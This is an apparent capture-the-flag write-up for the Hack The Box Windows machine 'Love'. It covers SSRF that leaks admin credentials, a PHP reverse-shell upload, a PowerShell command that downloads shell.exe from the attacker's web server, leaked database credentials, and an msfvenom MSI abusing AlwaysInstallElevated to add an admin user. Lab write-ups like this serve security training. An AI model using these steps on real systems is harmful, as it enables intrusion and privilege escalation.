Name: Love
Release Date: 01 May 2021
Retire Date: 07 Aug 2021
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
Tartofraise 00 days, 00 hours, 08 mins, 48 seconds
celesian 00 days, 00 hours, 18 mins, 12 seconds
Creator: pwnmeow
Pentest Workstation PDF: Love.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have several ports open on this box and many are running some form of web server. Looking at the SSL checks performed on HTTPS TCP 443, we see there are a few hostnames, so let's begin by adding them to /etc/hosts


sudo vi /etc/hosts


Now that we have that out of the way, we'll need to re-run Gobuster but on the hostnames instead of the IP addresses. However, none of the Gobuster output is helpful on this box. Let's see about manual navigation. (found by clicking Demo)

So, 5000 is forbidden from direct navigation, but the Malware Scanner may be a potential attack point for LFI or calling localhost (since it is scanning the localhost) on the 5000 port to see if anything returns a response. Sure enough, if we call, we DO get a response and it just happens to have admin credentials!  Nice!


Vote Admin Creds admin: @LoveIsInTheAir!!!!

Now that we have admin credentials to the Voting system, we try to log in. Now that we are logged in, let's check oout searchsploit and see if there's anything we can use and sure enough php/webapps/ is an authenticated File Upload RCE exploit that should get us a foothold on the box. After trying a few times on different ports, the exploit fails. So, I'm going to show the manual method of exploiting the File Upload RCE. Looking around the admin portal, we see that we can update our profile picture and since the system is running PHP, I'm going to generate a reverse shell in PHP for Windows and also attempt to upload a Windows shell to stabilize the shell. I used the one:


and set my netcat listener to 1234, a web server on 8080, and another nc listener to 1337. Upload the windows-php-reverse-shell, run "powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/shell.exe','shell.exe')" and we have a shell (a stable one) as phoebe.

C:\Users\Phoebe\Desktop>type user.txt
type user.txt




Getting systeminfo and checking different interesting files, we find some credentials in C:\xampp\htdocs\omrs\includes\conn.php for phoebe.  


        $conn = new mysqli('localhost', 'phoebe', 'HTB#9826^(_', 'votesystem');

        if ($conn->connect_error) {
            die("Connection failed: " . $conn->connect_error);


We keep enumerating the machine and, through WINPeas, we find that AlwaysInstallElevated is set to True! That's an easy attack vector, especially with WINPeas gives us the URL to the method!

msfvenom -p windows/adduser --platform windows -a x64 USER=PWNED PASS='Password1!' -f msi -o privesc.msi


Upload it using a slightly modified version of the earlier command:


powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/privesc.msi','privesc.msi')



Then, connect using


└─$ sudo python3 ./ PWNED:'Password1!'@ 


Grab the root.txt flag and we're on to the next :D


C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt

C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt

C:\WINDOWS\system32>type C:\users\phoebe\desktop\user.txt